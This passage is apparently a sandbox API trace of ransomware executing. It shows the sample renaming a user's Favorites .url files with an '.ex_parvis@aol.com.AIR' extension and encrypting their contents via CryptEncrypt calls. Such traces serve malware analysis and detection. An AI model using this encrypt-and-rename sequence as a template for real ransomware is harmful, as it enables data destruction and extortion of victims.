halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.477] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550 [0167.477] GetProcessHeap () returned 0x2e0000 [0167.477] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.477] GetFileSizeEx (in: hFile=0x550, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.477] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.478] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.478] GetProcessHeap () returned 0x2e0000 [0167.478] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.478] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.478] WriteFile (in: hFile=0x550, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.479] WriteFile (in: hFile=0x550, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.479] WriteFile (in: hFile=0x550, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.479] ReadFile (in: hFile=0x550, lpBuffer=0x312a78, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x312a78*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.479] SetFilePointer (in: hFile=0x550, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.479] WriteFile (in: hFile=0x550, lpBuffer=0x31f5f0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31f5f0*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.480] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb163f970, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb163f970, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1968 [0167.480] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.480] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.480] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url", dwFileAttributes=0x80) returned 1 [0167.481] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 68 [0167.481] GetProcessHeap () returned 0x2e0000 [0167.481] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xee) returned 0x30a498 [0167.481] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" [0167.481] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.481] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.483] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x554 [0167.483] GetProcessHeap () returned 0x2e0000 [0167.483] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.483] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.484] SetFilePointer (in: hFile=0x554, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.484] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.484] GetProcessHeap () returned 0x2e0000 [0167.484] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.484] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.484] WriteFile (in: hFile=0x554, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.485] WriteFile (in: hFile=0x554, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.485] WriteFile (in: hFile=0x554, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.485] ReadFile (in: hFile=0x554, lpBuffer=0x336e70, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336e70*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.485] SetFilePointer (in: hFile=0x554, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.485] WriteFile (in: hFile=0x554, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.485] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.486] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.486] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url", dwFileAttributes=0x80) returned 1 [0167.499] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 61 [0167.499] GetProcessHeap () returned 0x2e0000 [0167.499] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe0) returned 0x3a7428 [0167.499] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" [0167.499] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.499] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.502] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x554 [0167.503] GetProcessHeap () returned 0x2e0000 [0167.503] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0167.503] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.503] SetFilePointer (in: hFile=0x554, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.503] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.503] GetProcessHeap () returned 0x2e0000 [0167.503] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.503] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.503] WriteFile (in: hFile=0x554, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.504] WriteFile (in: hFile=0x554, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.504] WriteFile (in: hFile=0x554, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.504] ReadFile (in: hFile=0x554, lpBuffer=0x336e70, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336e70*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.504] SetFilePointer (in: hFile=0x554, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.504] WriteFile (in: hFile=0x554, lpBuffer=0x31fae0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.505] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.505] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.505] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url", dwFileAttributes=0x80) returned 1 [0167.505] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 68 [0167.505] GetProcessHeap () returned 0x2e0000 [0167.505] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xee) returned 0x30a498 [0167.505] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" [0167.505] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.505] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.507] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x554 [0167.507] GetProcessHeap () returned 0x2e0000 [0167.507] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.507] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.507] SetFilePointer (in: hFile=0x554, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.507] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.507] GetProcessHeap () returned 0x2e0000 [0167.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.507] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.508] WriteFile (in: hFile=0x554, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.509] WriteFile (in: hFile=0x554, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.509] WriteFile (in: hFile=0x554, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.509] ReadFile (in: hFile=0x554, lpBuffer=0x336e70, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336e70*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.509] SetFilePointer (in: hFile=0x554, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.509] WriteFile (in: hFile=0x554, lpBuffer=0x31fb78*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fb78*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.509] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.509] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.509] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url", dwFileAttributes=0x80) returned 1 [0167.510] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 67 [0167.510] GetProcessHeap () returned 0x2e0000 [0167.510] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xec) returned 0x31fae0 [0167.510] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" [0167.510] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.510] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.514] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x554 [0167.514] GetProcessHeap () returned 0x2e0000 [0167.514] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0167.514] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.514] SetFilePointer (in: hFile=0x554, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.514] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.514] GetProcessHeap () returned 0x2e0000 [0167.514] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.514] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.514] WriteFile (in: hFile=0x554, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.515] WriteFile (in: hFile=0x554, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.515] WriteFile (in: hFile=0x554, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.516] ReadFile (in: hFile=0x554, lpBuffer=0x336e70, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336e70*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.516] SetFilePointer (in: hFile=0x554, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.516] WriteFile (in: hFile=0x554, lpBuffer=0x31fae0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.516] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.516] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.516] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url", dwFileAttributes=0x80) returned 1 [0167.517] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 75 [0167.517] GetProcessHeap () returned 0x2e0000 [0167.517] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363b58 [0167.517] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" [0167.517] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.517] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.520] CreateFileW 